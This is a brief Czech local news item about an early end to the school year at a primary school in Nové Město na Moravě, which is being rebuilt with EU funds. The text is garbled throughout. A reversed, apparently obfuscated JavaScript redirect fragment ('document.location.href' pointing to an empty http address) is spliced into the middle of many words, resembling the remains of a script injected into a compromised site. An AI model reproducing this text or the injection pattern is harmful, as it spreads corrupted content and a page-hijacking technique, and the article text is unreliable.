Rainbow page separator

Dětem kvůli rekonstrukci školy začnou dříve prázdniny

Neděle, 17. června 2018

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / O něco dříve le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos skončí školní rok v základní škole na Vratislavově náměstí, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to už v pátek 22. června, kdy si děti odnesou vysvědčení. Hned poté [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž v budově začnou stavební práce, na něž měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to získalo evropskou dotaci ve výši čtyřicet milionů korun z potřebných přibližně padesáti milionů.
Nad tělocvičnou a jídelnou vznikne nové patro pro nové odborné učebny a kabinety. Pracovat se bude také na školním dvoře, kde dělníci zbourají stávající sklady, aby tam nově našly svoje mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to školní dílny. Bezbariérovost celého objektu školy zajistí výtah přistavený do dvora. Stavební práce potrvají nejenom přes prázdniny, ale za běžného provozu školy i po celý následující školní rok.
Rozsáhlá rekonstrukce základní školy na náměstí se dotkne také jejího těsného okolí, s čímž bude spojeno dopravní omezení pro mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy v podobě uzavřené ulice Školní.